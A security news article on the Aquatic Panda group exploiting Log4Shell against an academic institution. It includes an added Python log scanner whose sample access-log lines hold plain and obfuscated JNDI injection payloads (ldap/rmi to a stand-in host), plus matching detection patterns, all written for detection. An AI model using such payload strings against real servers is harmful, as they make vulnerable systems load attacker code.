Log4Shell exploit used by Chinese APT hackers targeting Universities

APT Aquatic Panda targets universities using Log4Shell exploit tools

Log4j vulnerability continues to create havoc: universities targeted by the Chinese APT group exploiting the Log4Shell flaw

Researchers disrupted an attempt to steal industrial intelligence and military secrets from an academic institution. The CrowdStrike research team reported the activity of a threat group named Aquatic Panda.[1] The never-before-seen Chinese hacker group leveraged the Log4Shell flaw in the Apache Log4j logging library to gain access to the targeted system. Once inside, the attackers can carry out a range of actions on the machine, including reconnaissance and credential harvesting.

The criminals exploited the Log4Shell vulnerability, which has already disrupted a good part of the world.[2] The attack targeted a large, undisclosed academic institution, and researchers from CrowdStrike Falcon OverWatch managed to disrupt the threat actors as they tried to exploit a vulnerable VMware installation. The purpose of this attack was industrial espionage and data collection.[3]

This state-sponsored hacker group has been active since 2020 and focuses mainly on intelligence collection and espionage. The main targets of this APT are organizations in the telecommunications, government, and technology sectors. According to the reports about this attack, the researchers informed the affected organization about the intrusion and an incident response protocol was started.

Close monitoring of suspicious activity helps stop potential exploits

Various cybersecurity firms monitor online activity and watch for exploitation of the vulnerability in the Apache Log4j logging library.[4] Because the flawed library is so widely used, products from Microsoft, Apple, Twitter, and Cloudflare can be vulnerable to such attacks. VMware Horizon service components can also be vulnerable to these exploits, according to recent reports.
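As an added example (not code from the original article or from CrowdStrike), the following Python script shows the kind of log monitoring described above: it normalizes the nested Log4j lookups that were used to disguise the JNDI lookup string and flags web-server access-log lines that carry it. The log lines and host names in it are constructed for illustration.

```python
import re
from typing import Dict, List

# Log4j resolves nested lookups innermost-first, so "${${lower:j}ndi:...}" or
# "${${::-j}ndi:...}" evaluates to "${jndi:...}" while hiding the literal token
# from a naive string match. Resolve the case-conversion and default-value forms
# before looking for the JNDI scheme.
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")  # ${anything:-x} -> x
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _apply_case(m) -> str:
    return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()


def normalize(text: str, max_rounds: int = 16) -> str:
    """Collapse lower/upper/default lookups until the string stops changing."""
    for _ in range(max_rounds):
        new = _DEFAULT.sub(r"\1", _CASE.sub(_apply_case, text))
        if new == text:
            break
        text = new
    return text


def scan_logs(lines: List[str]) -> List[Dict[str, object]]:
    """Return one hit per log line whose normalized form contains a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        norm = normalize(line)
        if _JNDI.search(norm):
            hits.append({"line_no": number, "normalized": norm, "raw": line})
    return hits


# Constructed access-log lines: a benign request, three exploitation attempts
# (plain, case-obfuscated, default-value-obfuscated) and a benign "${...}" string.
SAMPLE_LOGS = [
    '10.0.0.5 - - [13/Dec/2021:10:01:22 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:10:02:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [13/Dec/2021:10:02:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://example.invalid/a}"',
    '10.0.0.9 - - [13/Dec/2021:10:02:11 +0000] "GET /?x=${${::-j}${::-n}${::-d}${::-i}:rmi://example.invalid/b} HTTP/1.1" 404 0 "-" "curl/7.68"',
    '10.0.0.12 - - [13/Dec/2021:10:03:00 +0000] "GET /docs/${project.version} HTTP/1.1" 200 10 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOGS):
        print(f"line {hit['line_no']}: {hit['normalized']}")
```

Only lines 2 to 4 are reported; the benign `${project.version}` string on line 5 is not, because it never resolves to a JNDI lookup.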

The OverWatch research team tracked the malicious actors and their activity throughout the intrusion. This way, details of the intrusion can be detected and passed to security administrators so the organization can mitigate the attack. Aquatic Panda used native OS binaries to determine current privilege levels and system and domain details, conducting reconnaissance from the compromised host.

The APT group also attempted to discover and stop a third-party endpoint detection and response (EDR) service. The attackers downloaded additional scripts and executed commands to retrieve malware from their toolkit; files with a VBS extension were obtained from remote infrastructure.

Based on the telemetry available, OverWatch believes these files likely constituted a reverse shell, which was loaded into memory via DLL search-order hijacking.

Multiple credential harvesting attempts

The threat actors tried to harvest credentials and other data by dumping process memory and using living-off-the-land binaries. They prepared for data exfiltration and then covered their tracks by deleting executables and other files from various directories.

The vulnerability has since been patched, and any application that might be affected should be secured. Aquatic Panda's further actions on the host were stopped and the attack was not successful. However, this exploit is fairly new and will keep disrupting operations for many months. It is believed that Log4Shell will help attackers carry out various disruptive actions and continue their nefarious activities in the new year.[5]

The vulnerability is deemed extremely critical, and it leaves much of the internet at risk. The discussion around the flaw has been intense, and many organizations have been on edge; that is not expected to change in the coming year. This potentially destructive vulnerability is the kind of news no one wants to hear, because compromised networks can have major consequences.

About the author
Gabriel E. Hall

Gabriel E. Hall is a passionate malware researcher who has been working for 2-spyware for almost a decade.
